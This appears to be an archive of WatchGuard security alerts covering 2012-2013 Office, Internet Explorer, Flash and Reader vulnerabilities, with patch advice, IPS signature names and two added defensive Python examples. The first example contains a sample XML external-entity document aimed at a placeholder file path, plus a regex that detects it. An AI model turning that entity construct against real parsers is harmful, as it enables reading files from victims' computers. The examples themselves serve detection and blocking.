Tag Archives: remote code execution

Office Patches Mend Word, Visio, Publisher, and Lync

Severity: High

Summary:

  • These vulnerabilities affect: Microsoft Office related products, including Word, Visio, Publisher, and Lync
  • How an attacker exploits them: Typically by enticing users to open or interact with maliciously crafted Office documents
  • Impact: In the worst case, an attacker can gain complete control of your Windows computer
  • What to do: Install the appropriate Microsoft patches as soon as possible, or let Windows Automatic Update do it for you.

Exposure:

Today, Microsoft released four security bulletins that fix 14 vulnerabilities in a range of Microsoft Office products, including Word, Visio, Publisher, and Lync. We summarize these four security bulletins below, in order from highest to lowest severity.

  • MS13-041: Lync Remote Code Execution (RCE) Vulnerability

 Lync is a unified communications tool that combines voice, IM, audio, video, and web-based communication into one interface. It’s essentially the replacement for Microsoft Communicator. It suffers from an unspecified memory corruption vulnerability that attackers could leverage to execute arbitrary code on your computer. If an attacker can convince one of your users to join a Lync or Communicator session containing specially crafted content, they could execute code on that user’s computer, with that user’s privileges. If you grant users local administrator privileges, the attacker could gain complete control of affected computers. This flaw only affects certain versions of Lync and Communicator. See the “Affected and Non-Affected Software” section of Microsoft’s bulletin for more details.

Microsoft rating: Critical

  • MS13-042: Multiple Publisher Memory Corruption Vulnerabilities

Publisher is Microsoft’s basic desktop publishing and layout program, and part of the Office suite. It suffers from eleven memory corruption vulnerabilities. They all differ technically, but share the same scope and impact. By luring one of your users into downloading and opening a malicious Publisher document, an attacker can exploit any of these flaws to execute code on that user’s computer, with that user’s privileges. Again, if your users have local administrator privileges, the attacker gains complete control of their PCs. These flaws affect all versions of Publisher except 2013.

Microsoft rating: Important

Word is the popular word processor that ships with Office. It suffers from a remote code execution (RCE) vulnerability having to do with how it handles Word or RTF documents containing maliciously crafted shape data. By enticing one of your users to download and open a specially crafted document, an attacker could leverage this flaw to execute code on that user’s computer, with that user’s privileges. If you grant users local administrator privileges, the attacker would gain complete control of their machines. The flaw only affects Word and Word Viewer 2003.

Microsoft rating: Important

  • MS13-044: Visio Information Disclosure Vulnerability

Microsoft Visio is a popular diagramming program often used to create network diagrams. Visio suffers from a complex information disclosure vulnerability, involving the way it parses specially crafted XML content. At a high level, XML documents can contain “external entities,” essentially text or binary data pulled in from an external location, including local files. If an attacker can entice one of your users into downloading and opening a malicious Visio document (containing such XML content), he can exploit this flaw to read data from files on the victim’s computer. This flaw affects all versions of Visio except 2013.

Microsoft rating: Important
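To make the Visio issue concrete, here is an added Python example (not part of the original alert or of any Microsoft or WatchGuard code) showing the two defensive checks a document gateway or parser would apply: flag any DTD entity declaration that names an external SYSTEM or PUBLIC source, and parse with external entity resolution disabled so the referenced file is never read. The sample documents, the VisioDocument/Text element names and the file:///PLACEHOLDER/path URI are constructed for the example.

```python
import io
import re
import xml.sax
from xml.sax import handler

# Constructed sample: a minimal XML document standing in for Visio XML content. It declares an
# external general entity and then references it inside a Text element. The URI is a placeholder.
SAMPLE_XXE = """<?xml version="1.0"?>
<!DOCTYPE VisioDocument [
  <!ENTITY ext SYSTEM "file:///PLACEHOLDER/path">
]>
<VisioDocument><Text>&ext;</Text></VisioDocument>
"""

# Constructed benign sample: a DOCTYPE with an internal entity only, which is harmless.
SAMPLE_BENIGN = """<?xml version="1.0"?>
<!DOCTYPE VisioDocument [
  <!ENTITY company "Example Corp">
]>
<VisioDocument><Text>&company;</Text></VisioDocument>
"""

# Entity declarations that pull content from elsewhere carry a SYSTEM or PUBLIC identifier;
# the optional "%" covers parameter entities as well as general ones.
EXTERNAL_ENTITY_DECL = re.compile(rb"<!ENTITY\s+(?:%\s+)?[^\s>]+\s+(?:SYSTEM|PUBLIC)\b")


def declares_external_entity(data: bytes) -> bool:
    """Gateway-style check: does the raw document declare any external entity at all?"""
    return EXTERNAL_ENTITY_DECL.search(data) is not None


class _TextCollector(handler.ContentHandler):
    """Collects character data so we can see exactly what the parser produced."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_text_safely(xml_text: str) -> str:
    """Parse with external entity resolution switched off and return the document's text.

    Recent Python versions already default these features to off; setting them explicitly
    documents the intent and protects against older interpreters.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, False)   # no external general entities
    parser.setFeature(handler.feature_external_pes, False)   # no external parameter entities
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.StringIO(xml_text))
    return "".join(collector.chunks)


if __name__ == "__main__":
    for name, doc in (("xxe", SAMPLE_XXE), ("benign", SAMPLE_BENIGN)):
        print(name, "external entity declared:", declares_external_entity(doc.encode()),
              "| parsed text:", repr(parse_text_safely(doc)))
```

With resolution disabled the external reference simply yields no text, while the internal entity still expands normally, so legitimate documents keep working.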

Solution Path:

Microsoft has released Office-related patches that correct all of these vulnerabilities. You should download, test, and deploy the appropriate updates throughout your network as soon as possible. If you choose, you can also let Windows Update automatically download and install these updates for you.

The links below point directly to the “Affected and Non-Affected Software” section of each bulletin, where you can find all of Microsoft’s update links:

For All WatchGuard Users:

WatchGuard’s Gateway Antivirus and Intrusion Prevention services can often prevent some of these types of attacks, or the malware they try to distribute. For instance, our IPS signature team has developed a signature that can detect and block the Visio Information Disclosure issue:

  • EXPLOIT Microsoft Visio XML External Entities Resolution Vulnerability (CVE-2013-1301)

Your XTM appliance should get this new IPS update shortly.

Nonetheless, we still recommend you install Microsoft’s updates to completely protect yourself from these flaws.

Status:

Microsoft has released patches correcting these issues.

References:

This alert was researched and written by Corey Nachreiner, CISSP (@SecAdept).


What did you think of this alert? Let us know at your.opinion.matters@watchguard.com.

Two Critical IE Bulletins Fix Zero Day Vulnerability and More

Severity: High

Summary:

  • These vulnerabilities affect: Internet Explorer (IE) versions 6 – 10
  • How an attacker exploits them: Typically, by enticing one of your users to visit a web page with malicious content
  • Impact: In the worst case, an attacker can execute code on your user’s computer, often gaining complete control of it
  • What to do: Install Microsoft’s IE updates immediately, or let Windows Automatic Update do it for you

Exposure:

As part of today’s Patch Day, Microsoft released two security bulletins (MS13-037/MS13-038) describing a dozen new security vulnerabilities that affect all current versions of Internet Explorer (IE). They rate both updates as Critical.

Over the last few months, most of the new flaws affecting IE are what developers call “use after free” vulnerabilities – a type of memory corruption flaw that attackers can leverage to execute arbitrary code. May’s duo of IE bulletins continues this theme, with all but one of the vulnerabilities falling under this class of flaw.

Though these dozen vulnerabilities differ technically, they share the same general scope and impact (with one small exception). If an attacker can lure one of your users to a web page containing maliciously crafted HTML, he could exploit any of these vulnerabilities to execute code on that user’s computer, inheriting that user’s privileges. Typically, Windows users have local administrative privileges, in which case the attacker can exploit these flaws to gain complete control of the victim’s computer. Keep in mind, attackers often hijack legitimate web pages and booby trap them with this sort of malicious code, in what the industry refers to as a “watering hole” attack.

Typically, Microsoft only releases one IE cumulative update a month. However, over the last few weeks attackers have exploited a zero day IE8 vulnerability in the wild—most notably against the Department of Labor (DoL) web site. We talked about this exploit in last week’s security video. Although Microsoft had released a temporary “FixIt” to mitigate this serious vulnerability, today’s second IE bulletin (MS13-038) rectifies the issue more completely. Attackers are still exploiting this flaw in the wild. They’ve worked it into their underground exploit toolkits, and even the popular Metasploit framework contains a public version of the exploit. We highly recommend you install both of Microsoft’s IE updates immediately (after testing, of course).

If you’d like more technical detail about any of these flaws, see the “Vulnerability Information” section in both of Microsoft’s bulletins (MS13-037/MS13-038).

Solution Path:

You should download, test, and deploy the appropriate IE updates immediately, or let Windows Automatic Update do it for you. You can find links to the various IE updates in the “Affected and Non-Affected Software” section of Microsoft’s IE security bulletins:

For All WatchGuard Users:

WatchGuard’s Gateway Antivirus and Intrusion Prevention services can often prevent these sorts of attacks, or the malware they try to distribute. For instance, our IPS signature team has developed signatures that can detect and block many of the “use after free” vulnerabilities described in Microsoft’s alert:

  • WEB-CLIENT Microsoft Internet Explorer Use After Free Vulnerability (CVE-2013-2551)
  • WEB-CLIENT Microsoft Internet Explorer Use After Free Vulnerability (CVE-2013-1309)
  • WEB-CLIENT Microsoft Internet Explorer Use After Free Vulnerability (CVE-2013-1311)
  • WEB-CLIENT Microsoft Internet Explorer Use After Free Vulnerability (CVE-2013-1312)
  • WEB-CLIENT Microsoft Internet Explorer Use After Free Vulnerability (CVE-2013-1307)
  • WEB-CLIENT Microsoft Internet Explorer Use After Free Vulnerability (CVE-2013-1308)
  • WEB-CLIENT Microsoft Internet Explorer JSON Array Information Disclosure Vulnerability (CVE-2013-1297)

Your XTM appliance should get this new IPS update shortly.

Furthermore, our Reputation Enabled Defense (RED) and WebBlocker services can often prevent your users from accidentally visiting malicious (or legitimate but booby-trapped) web sites that contain these sorts of attacks. Nonetheless, we still recommend you install Microsoft’s updates to completely protect yourself from all of these flaws.

Status:

Microsoft has released patches to fix these vulnerabilities.

References:

This alert was researched and written by Corey Nachreiner, CISSP (@SecAdept).

“Use After Free” Flaws: A New Theme for IE Vulnerability

Severity: High

Summary:

  • These vulnerabilities affect: Most current versions of Internet Explorer (IE)
  • How an attacker exploits them: By enticing one of your users to visit a malicious web page
  • Impact: An attacker can execute code on your user’s computer, often gaining complete control of it
  • What to do: Install Microsoft’s IE updates immediately, or let Windows Automatic Update do it for you

Exposure:

As part of today’s Patch Day, Microsoft released a security bulletin describing two new security vulnerabilities affecting Internet Explorer (IE). Similar to the flaws in last month’s update, both of these vulnerabilities are what developers call “use after free” vulnerabilities – a type of memory corruption flaw that attackers can leverage to execute arbitrary code. This class of vulnerability seems to be a theme for IE lately, since Microsoft has been fixing IE use after free flaws quite a bit over the last few months.

In any case, if an attacker can lure one of your users to a web page containing maliciously crafted HTML, she could exploit either of these vulnerabilities to execute code on that user’s computer, inheriting that user’s privileges. Typically, Windows users have local administrative privileges, in which case the attacker can exploit these flaws to gain complete control of the victim’s computer.

If you’d like more technical detail about either of these flaws, see the “Vulnerability Information” section of Microsoft’s bulletin. Technicalities aside, both of these remote code execution flaws pose significant risk to IE users, and allow attackers to launch drive-by download attacks. Attackers often hijack legitimate web sites and force them to serve this kind of malicious web code. So these types of flaws may affect you even when visiting legitimate, trusted web sites.

If you use IE, you should download and install Microsoft’s cumulative update immediately.

Solution Path:

You should download, test, and deploy the appropriate IE updates immediately, or let Windows Automatic Update do it for you. You can find links to the various IE updates in the “Affected and Non-Affected Software” section of Microsoft’s IE security bulletin.

For All WatchGuard Users:

WatchGuard’s Gateway Antivirus services can often prevent the malware that drive-by download attacks try to force onto your computer. Furthermore, our Reputation Enabled Defense (RED) and WebBlocker service can often prevent your users from accidentally visiting malicious sites. Nonetheless, we still recommend you install Microsoft’s IE update to completely protect yourself from these vulnerabilities.

Status:

Microsoft has released patches to fix these vulnerabilities.

References:

This alert was researched and written by Corey Nachreiner, CISSP (@SecAdept).

IE Update Fixes Multiple “Use After Free” Vulnerabilities

Severity: High

Summary:

  • These vulnerabilities affect: Most current versions of Internet Explorer (IE)
  • How an attacker exploits them: By enticing one of your users to visit a malicious web page
  • Impact: An attacker can execute code on your user’s computer, often gaining complete control of it
  • What to do: Install Microsoft’s IE updates immediately, or let Windows Automatic Update do it for you

Exposure:

As part of today’s Patch Day, Microsoft released a security bulletin describing nine new security vulnerabilities affecting Internet Explorer (IE). Similar to the last few IE updates, all nine of these security flaws are what developers call “use after free” vulnerabilities, which are types of memory corruption flaws that attackers can leverage to execute arbitrary code. They all have to do with how IE handles various HTML objects and elements. If an attacker can lure one of your users to a web page containing maliciously crafted HTML, he could exploit any one of these vulnerabilities to execute code on that user’s computer, inheriting that user’s privileges. Typically, Windows users have local administrative privileges, in which case the attacker can exploit these flaws to gain complete control of the victim’s computer.

If you’d like more technical detail about these flaws, see the “Vulnerability Information” section of Microsoft’s bulletin. Details aside, all of these remote code execution flaws pose significant risk to IE users, and allow attackers to launch drive-by download attacks. Attackers often hijack legitimate web sites and force them to serve this kind of malicious web code. So these types of flaws may affect you even when visiting legitimate, trusted web sites.

If you use IE, you should download and install Microsoft’s cumulative update immediately.

Solution Path:

You should download, test, and deploy the appropriate IE updates immediately, or let Windows Automatic Update do it for you. You can find links to the various IE updates in the “Affected and Non-Affected Software” section of Microsoft’s IE security bulletin.

For All WatchGuard Users:

WatchGuard’s Gateway Antivirus and Intrusion Prevention services can often prevent these sorts of attacks, or the malware they try to distribute.

More specifically, our IPS signature team has developed new signatures, which can detect and block a number of these new IE vulnerabilities:

  • WEB-CLIENT Microsoft Internet Explorer GetMarkupPtr Use After Free Vulnerability (CVE-2013-0092)
  • WEB-CLIENT Microsoft Internet Explorer CTreeNode Use After Free Vulnerability (CVE-2013-1288)
  • WEB-CLIENT Microsoft Internet Explorer CElement Use After Free Vulnerability (CVE-2013-0091)
  • WEB-CLIENT Microsoft Internet Explorer OnResize Use After Free Vulnerability (CVE-2013-0087)
  • WEB-CLIENT Microsoft Internet Explorer saveHistory Use After Free Vulnerability (CVE-2013-0088)
  • WEB-CLIENT Microsoft Internet Explorer CMarkupBehaviorContext Use After Free Vulnerability (CVE-2013-0089)
  • WEB-CLIENT Microsoft Internet Explorer CCaret Use After Free Vulnerability (CVE-2013-0090)
  • WEB-CLIENT Microsoft Internet Explorer removeChild Use After Free Vulnerability (CVE-2013-0094)

Nonetheless, we still recommend you install Microsoft’s IE update to completely protect yourself from these vulnerabilities.

Status:

Microsoft has released patches to fix these vulnerabilities.

References:

This alert was researched and written by Corey Nachreiner, CISSP (@SecAdept).

Two IE Bulletins Double the Browser Updates

Severity: High

Summary:

  • These vulnerabilities affect: Internet Explorer (IE) 10 and earlier
  • How an attacker exploits them: Typically, by enticing one of your users to visit a web page with malicious content
  • Impact: Various; in the worst case, an attacker can execute code on your user’s computer, often gaining complete control of it
  • What to do: Install Microsoft’s Internet Explorer updates immediately, or let Windows Automatic Update do it for you

Exposure:

In a relatively unusual move, Microsoft released two Internet Explorer (IE) security bulletins today, rather than their typical single cumulative update. Combined, the two bulletins fix 14 vulnerabilities in the popular web browser, many of which allow attackers to execute code on vulnerable Windows systems.

We summarize the two bulletins below:

  • MS13-009: February IE Cumulative Update

This update fixes 13 vulnerabilities in IE, most of them being “use after free” vulnerabilities similar to the ones Microsoft fixed with last month’s out-of-cycle IE bulletin. By luring one of your users to a web site containing malicious code, a remote attacker can exploit most of these vulnerabilities to execute code on your computer, with your privileges. As always, if you have local administrator privileges, the attacker could exploit this issue to gain complete control of your computer.

Microsoft rating: Critical

  • MS13-010: VML Memory Corruption Vulnerability

Vector Markup Language (VML) is a graphics standard for creating 2D vector illustrations with XML files. The VML component in IE suffers from a memory corruption vulnerability having to do with how it allocates buffers. By enticing your users to a web site with specially crafted content, a remote attacker could exploit this flaw to execute code on that user’s computer, with the user’s privileges. Since most Windows users have local administrative privileges, this sort of attack often gives the attacker complete control of their computers.

Microsoft rating: Critical

Malicious hackers often leverage these types of vulnerabilities in drive-by download attacks, and they also target legitimate web sites and booby-trap them with malicious code. In other words, you can sometimes encounter these sorts of “drive-by download” attacks even while visiting trusted, legitimate web sites. We recommend you update your IE users immediately.

Solution Path:

These updates fix serious issues. You should download, test, and deploy the appropriate IE patches immediately, or let Windows Automatic Update do it for you.

The links below point directly to the “Affected and Non-Affected Software” section of each bulletin, where you can find links to the various updates:

For All WatchGuard Users:

These attacks travel as normal-looking HTTP traffic, which you must allow if your network users need to access the World Wide Web. Therefore, the patches above are your best solution.

That said, WatchGuard’s Gateway Antivirus and Intrusion Prevention Service can often prevent these sorts of attacks, or the malware they try to distribute. For instance, our IPS team has created signatures for the following:

  • Various “use after free” vulnerabilities - CVE-2013-0018, CVE-2013-0019, CVE-2013-0020, CVE-2013-0021, CVE-2013-0022, CVE-2013-0023, CVE-2013-0024, CVE-2013-0025, CVE-2013-0026, CVE-2013-0027, CVE-2013-0028, CVE-2013-0029
  • JIS character encoding vulnerability - CVE-2013-0015
  • VML memory corruption vulnerability - CVE-2013-0030

These signatures will be available in our next IPS update, which should come out shortly. We highly recommend you enable our security services on your WatchGuard XTM and XCS appliances, and keep IPS and AV up to date.

Status:

Microsoft has released patches to fix these vulnerabilities.

References:

This alert was researched and written by Corey Nachreiner, CISSP (@SecAdept).

Emergency Flash Update Fixes “In the Wild” Vulnerabilities

Summary:

  • These vulnerabilities affect: Adobe Flash Player running on all platforms
  • How an attacker exploits it: By enticing a user to open any malicious Flash (SWF) content, whether from a web site, embedded within a Word document, and so on
  • Impact: In the worst case, an attacker can execute code on the user’s computer, potentially gaining control of it
  • What to do: Download and install the latest version of Adobe Flash Player for your platform

Exposure:

Adobe Flash Player displays interactive, animated web content called Flash. Although Flash is optional, 99% of PC users download and install it to view multimedia web content. It runs on many operating systems, including mobile operating systems like Android.

Today, Adobe released an emergency security bulletin to fix two Flash Player vulnerabilities, which attackers are actively exploiting in the wild. Both flaws are memory corruption-related issues; one being a buffer overflow vulnerability. If an attacker can entice one of your users into opening any Flash content, he could exploit either of these flaws to execute code on that user’s computer, with that user’s privileges. If your Windows users have local administrator privileges, an attacker could exploit this flaw to gain full control of their PCs.

As mentioned earlier, attackers are actively exploiting both these vulnerabilities in the wild. Currently, the attackers try to deliver the malicious Flash either via a booby-trapped web site, or by embedding it within malicious Word documents.

Besides patching, we recommend you educate your users about the dangers of interacting with unsolicited Word (or PDF) documents. Many of the more advanced breaches over the last few years have begun as very targeted spear-phishing emails which included malicious Word or PDF documents. Although security appliances, like WatchGuard’s, can detect some of these malicious documents using AV and IPS, you should still inform your employees to remain vigilant against these sorts of attacks.

Solution Path

Adobe has released new versions of Flash Player to fix these issues. If you allow Adobe Flash in your network, you should download and install the new versions immediately. If you’ve enabled Flash Player’s recent “silent update” option, you will receive this update automatically.

You can download Flash for your computer at the link provided below. See the bulletin’s “Affected Software” section for more details on getting Flash updates for other platforms:

Keep in mind, if you use Google Chrome you’ll have to update it separately.

For All WatchGuard Users:

If you choose, you can configure the HTTP proxy on your XTM appliance to block Flash content (and Word documents). Keep in mind, doing so blocks all such content, whether legitimate or malicious.

Our proxies offer many ways for you to block files and content, including by file extension, by MIME type, or by using very specific hexadecimal patterns found in the body of a message – a technique sometimes referred to as Magic Byte detection. Below I list the various ways you can identify these files:

File Extension:

  • .flv – Adobe Flash video file (the format typically used on websites)
  • .fla – Flash movie (authoring) file
  • .f4v – Flash video file
  • .f4p – Protected Flash video file
  • .f4a – Flash audio file
  • .f4b – Flash audiobook file

MIME types:

  • video/x-flv
  • video/mp4 (used for more than just Flash)
  • audio/mp4 (used for more than just Flash)

FILExt.com reported Magic Byte Pattern:

  • FLV Hex: 46 4C 56 01
  • FLV ASCII: FLV
  • FLA Hex: D0 CF 11 E0 A1 B1 1A E1 00

(Keep in mind, not all the hex and ASCII patterns shared here are appropriate for content blocking. If a pattern is too short, or not unique enough, blocking on it could result in many false positives.)
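The three identification methods listed above (extension, MIME type and leading bytes) as an added Python example, not part of the original alert or of the XTM proxy configuration. It checks the leading bytes first so a Flash file renamed to .jpg is still caught, treats the FLA header as the generic OLE compound-file signature it actually is (the same header begins every pre-2007 Word, Excel and PowerPoint file, the kind of non-unique pattern the caveat above warns about), and goes one step beyond the alert’s table by recognising the ftyp brands of the F4V family inside MP4 containers; those brand values and the sample responses are assumptions constructed for the example.

```python
import os
from typing import Optional, Tuple

# Magic-byte patterns from the alert's FILExt table.
FLV_MAGIC = bytes.fromhex("464C5601")              # "FLV" followed by version byte 0x01
OLE_CFB_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # FLA header; identical for every OLE compound file (.doc, .xls, .ppt)
# The bare 3-byte ASCII "FLV" pattern is deliberately not used: too short, too many false positives.

# Extension and MIME lists from the alert.
FLASH_EXTENSIONS = {".flv", ".fla", ".f4v", ".f4p", ".f4a", ".f4b"}
FLASH_ONLY_MIME = {"video/x-flv"}
SHARED_MIME = {"video/mp4", "audio/mp4"}           # used for more than just Flash

# Assumption beyond the alert's table: ISO base-media "ftyp" brands of the F4V family, which
# lets the MP4-based .f4v/.f4p/.f4a/.f4b files be recognised by content rather than by name.
F4X_BRANDS = {b"f4v ", b"f4p ", b"f4a ", b"f4b "}


def sniff(body: bytes) -> Optional[str]:
    """Label the payload from its leading bytes, or None when nothing matches."""
    if body.startswith(FLV_MAGIC):
        return "flv"
    if body.startswith(OLE_CFB_MAGIC):
        return "ole-compound"       # FLA or a legacy Office document; not Flash-specific
    if len(body) >= 12 and body[4:8] == b"ftyp":
        return "f4x" if body[8:12] in F4X_BRANDS else "mp4"
    return None


def classify(url_path: str, content_type: str, body: bytes) -> Tuple[str, str]:
    """Return (verdict, reason) for one HTTP response: 'block' or 'allow'."""
    ext = os.path.splitext(url_path.split("?", 1)[0])[1].lower()
    mime = content_type.split(";", 1)[0].strip().lower()
    label = sniff(body)

    # Content checks come first so a renamed file or a lying Content-Type header cannot slip past.
    if label == "flv":
        return ("block", "FLV magic bytes")
    if label == "f4x":
        return ("block", "F4V-family ftyp brand")
    if ext in FLASH_EXTENSIONS:
        return ("block", "Flash file extension " + ext)
    if mime in FLASH_ONLY_MIME:
        return ("block", "Flash MIME type " + mime)
    if label == "ole-compound":
        # The alert also offers blocking Word documents, and this signature cannot tell FLA from .doc,
        # so blocking on it catches both; every legitimate legacy Office file is caught too.
        return ("block", "OLE compound-file header (FLA or legacy Office document)")
    if label == "mp4" or mime in SHARED_MIME:
        return ("allow", "MP4 container without an F4V brand; shared MIME type is not Flash-specific")
    return ("allow", "no Flash indicator")


# Constructed sample responses (path, Content-Type, first bytes of body) to exercise the checks.
SAMPLE_RESPONSES = [
    ("/media/intro.flv", "video/x-flv", FLV_MAGIC + b"\x05\x00\x00\x00\x09"),
    ("/img/photo.jpg", "image/jpeg", FLV_MAGIC + b"\x05\x00\x00\x00\x09"),      # renamed FLV
    ("/clip.mp4", "video/mp4", b"\x00\x00\x00\x18ftypisom\x00\x00\x02\x00"),    # ordinary MP4
    ("/clip.mp4", "video/mp4", b"\x00\x00\x00\x18ftypf4v \x00\x00\x00\x00"),    # F4V by brand
    ("/old/report.doc", "application/msword", OLE_CFB_MAGIC + b"\x00" * 8),
    ("/docs/guide.pdf", "application/pdf", b"%PDF-1.4\n%\xe2\xe3\xcf\xd3"),
]


def classify_samples():
    """Run every constructed sample through classify() and return the verdicts."""
    return [(path, classify(path, ctype, body)) for path, ctype, body in SAMPLE_RESPONSES]


if __name__ == "__main__":
    for path, (verdict, reason) in classify_samples():
        print(f"{verdict:5s} {path:20s} {reason}")
```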

If you decide you want to block these files, the links below contain instructions that will help you configure your XTM proxy’s content blocking features using the file and MIME information listed above.

Status:

Adobe has released updates to fix these Flash vulnerabilities.

References:

This alert was researched and written by Corey Nachreiner, CISSP (@SecAdept)

Avoid Drive-by Downloads; Patch IE

Severity: High

Summary:

  • These vulnerabilities affect: All current versions of Internet Explorer (IE)
  • How an attacker exploits them: By enticing one of your users to visit a malicious web page
  • Impact: An attacker can execute code on your user’s computer, often gaining complete control of it
  • What to do: Install Microsoft’s IE updates immediately, or let Windows Automatic Update do it for you

Exposure:

As part of today’s Patch Day, Microsoft released a security bulletin describing three new security vulnerabilities affecting Internet Explorer (IE). Technically, the new vulnerabilities seem only to affect IE 9 and 10, yet Microsoft has released the cumulative update for all versions. They rate this update as Critical.

Similar to last month, all three of these security flaws are “use after free” vulnerabilities, which are types of memory corruption flaws that attackers can leverage to execute arbitrary code. They all have to do with how IE handles various HTML objects. If an attacker can lure one of your users to a web page containing maliciously crafted HTML, he could exploit any one of these vulnerabilities to execute code on that user’s computer, inheriting that user’s privileges. Typically, Windows users have local administrative privileges, in which case the attacker can exploit these flaws to gain complete control of the victim’s computer.

If you’d like more technical detail about these flaws, see the “Vulnerability Information” section of Microsoft’s bulletin. Details aside, all of these remote code execution flaws pose significant risk to IE users, and allow attackers to launch drive-by download attacks. Attackers often hijack legitimate web sites and force them to serve this kind of malicious web code. So these types of flaws may affect you even when visiting legitimate, trusted web sites.  If you use IE, you should download and install Microsoft’s cumulative update immediately.

Solution Path:

You should download, test, and deploy the appropriate IE updates immediately, or let Windows Automatic Update do it for you. You can find links to the various IE updates in the “Affected and Non-Affected Software” section of Microsoft’s IE security bulletin.

For All WatchGuard Users:

WatchGuard’s Gateway Antivirus and Intrusion Prevention services can often prevent these sorts of attacks, or the malware they try to distribute.

More specifically, our IPS signature team has developed a new signature, which can detect and block at least one of these new IE vulnerabilities:

  • WEB-CLIENT Microsoft Internet Explorer Improper Ref Counting Use After Free (CVE-2012-4787)

Your appliance should get this new IPS update shortly.

Nonetheless, we still recommend you install Microsoft’s IE update to completely protect yourself from these vulnerabilities.

Status:

Microsoft has released patches to fix these vulnerabilities.

References:

This alert was researched and written by Corey Nachreiner, CISSP.

Three Critical Vulnerabilities Only Affect IE 9

Severity: High

Summary:

  • These vulnerabilities affect: Internet Explorer (IE) 9 only
  • How an attacker exploits them: By enticing one of your users to visit a malicious web page
  • Impact: An attacker can execute code on your user’s computer, often gaining complete control of it
  • What to do: Install Microsoft’s Internet Explorer 9 updates immediately, or let Windows Automatic Update do it for you

Exposure:

As part of today’s Patch Day, Microsoft released a security bulletin describing three new security vulnerabilities that affect Internet Explorer (IE) 9.0, running on Windows Vista, 7, and Server 2008. These vulnerabilities do not affect any other versions of IE. Microsoft rates the aggregate severity of these new flaws as Critical.

The three security flaws are all “use after free” vulnerabilities, which are types of memory corruption flaws that attackers can leverage to execute arbitrary code. They all have to do with how IE handles various specially crafted HTML objects.  If an attacker can lure one of your users to a web page containing maliciously crafted HTML, he could exploit any one of these vulnerabilities to execute code on that user’s computer, inheriting that user’s privileges. Typically, Windows users have local administrative privileges, in which case the attacker can exploit these flaws to gain complete control of the victim’s computer.

If you’d like to know more about the technical differences between these flaws, see the “Vulnerability Information” section of Microsoft’s bulletin. Details aside, all of these remote code execution flaws pose significant risk to IE users, and allow attackers to launch drive-by download attacks. Attackers often hijack legitimate web sites and force them to serve this kind of malicious web code. So these types of flaws may affect you even when visiting legitimate, trusted web sites.  If you use IE, you should download and install Microsoft’s cumulative update immediately.

Solution Path:

You should download, test, and deploy the appropriate IE updates immediately, or let Windows Automatic Update do it for you. You can find links to the various IE updates in the “Affected and Non-Affected Software” section of Microsoft’s IE security bulletin.

For All WatchGuard Users:

WatchGuard’s Gateway Antivirus and Intrusion Prevention services can often prevent these sorts of attacks, or the malware these attacks try to distribute.

More specifically, our IPS signature team has developed three new signatures, which can detect and block these new IE vulnerabilities:

  • WEB-CLIENT Microsoft IE CTreeNode Use After Free Vulnerability (CVE-2012-4775)
  • EXPLOIT Microsoft IE CFormElement Use After Free Vulnerability (CVE-2012-1538)
  • EXPLOIT Microsoft IE CTreePos Use After Free Vulnerability (CVE-2012-1539)

Your appliance should get this new IPS update shortly.

Nonetheless, we still recommend you install Microsoft’s IE update to completely protect yourself from these vulnerabilities.

Status:

Microsoft has released patches to fix these vulnerabilities.

References:

This alert was researched and written by Corey Nachreiner, CISSP.

Adobe Flash Player Update and Reader X 0day

Summary:

  • These vulnerabilities affect: Adobe Flash Player running on all platforms, Adobe Air, and all versions of Reader X
  • How an attacker exploits it: By enticing users to visit a website containing malicious Flash content (or into downloading and opening a malicious PDF)
  • Impact: In the worst case, an attacker can execute code on the user’s computer, potentially gaining control of it
  • What to do: Download and install the latest version of Adobe Flash Player for your platform (see Solution section for Reader X flaw mitigation)

Exposure:

Adobe Flash Player displays interactive, animated web content called Flash. Although Flash is optional, 99% of PC users download and install it to view multimedia web content. It runs on many operating systems, including mobile operating systems like Android.

This week, Adobe released a security bulletin describing seven security vulnerabilities  (based on CVE numbers) that affect Flash Player running on any platform. It doesn’t describe the flaws in much technical detail, other than mentioning they consist of buffer overflow vulnerabilities and other types of memory corruption flaws. That said, Adobe does warn that if an attacker can entice one of your users to visit a malicious website containing specially crafted Flash content, he could exploit any of these flaws to execute code on that user’s computer, with that user’s privileges. If your Windows users have local administrator privileges, an attacker could exploit this flaw to gain full control of their PCs.

Though it doesn’t look like attackers are exploiting these Flash flaws in the wild yet, Adobe rates them as “Priority 1” for Windows users, and recommends you apply the Windows updates within 72 hours. These vulnerabilities also affect other platforms as well, though not as severely. I recommend you update any Flash capable device as soon as you can.

In semi-related news, a Russian security group warns they have found attackers exploiting a zero day Adobe Reader X vulnerability in the wild. The flaw affects the most recent versions of the popular PDF reader, and can even escape its sandbox protection. In short, if you interact with the wrong PDF document, an attacker could gain complete control of your computer. The good news is the web version of this attack does require a victim to close and re-open their browser to succeed, making it a little harder to pull off.

At the time of writing, Adobe has yet to respond to this zero day report, and has not released a patch. Your primary recourse is to avoid unsolicited PDF documents. You can also leverage WatchGuard’s file-blocking capabilities to temporarily restrict your users’ access to PDF files, though this will also prevent them from downloading legitimate ones.

One final note: Next month Adobe plans to sync their Flash updates with Microsoft’s Patch Tuesday updates. So you can expect all future Adobe updates (other than perhaps emergency ones), on the second Tuesday of the month.

Solution Path

Adobe has released new versions of Flash Player to fix these issues. If you allow Adobe Flash in your network, you should download and install the new versions immediately. If you’ve enabled Flash Player’s recent “silent update” option, you will receive this update automatically.

You can download Flash for your computer at the link provided below. See the bulletin’s “Affected Software” section for more details on getting Flash updates for other platforms:

Keep in mind that Google Chrome bundles its own copy of Flash Player, which is updated through Chrome’s own update mechanism rather than by the standalone Flash installer, so make sure Chrome itself is up to date.

There is no fix yet for the zero day Reader X vulnerability. We recommend you avoid handling unsolicited PDF documents, or you can block them on all our security appliances.

For All WatchGuard Users:

If you choose, you can configure the HTTP proxy on your XTM appliance to block Flash or PDF content. Keep in mind, doing so blocks all such content, whether legitimate or malicious.

Our proxies offer many ways for you to block files and content, including by file extension, by MIME type, or by very specific hexadecimal patterns found in the body of a message – a technique sometimes referred to as Magic Byte detection. Below I list the ways you can identify these files:

File Extension:

  • .swf – compiled Flash content (the format web pages actually embed)
  • .flv – Flash video file (the format typically streamed on websites)
  • .fla – Flash authoring (source) file
  • .f4v – Flash video file
  • .f4p – Protected Flash video file
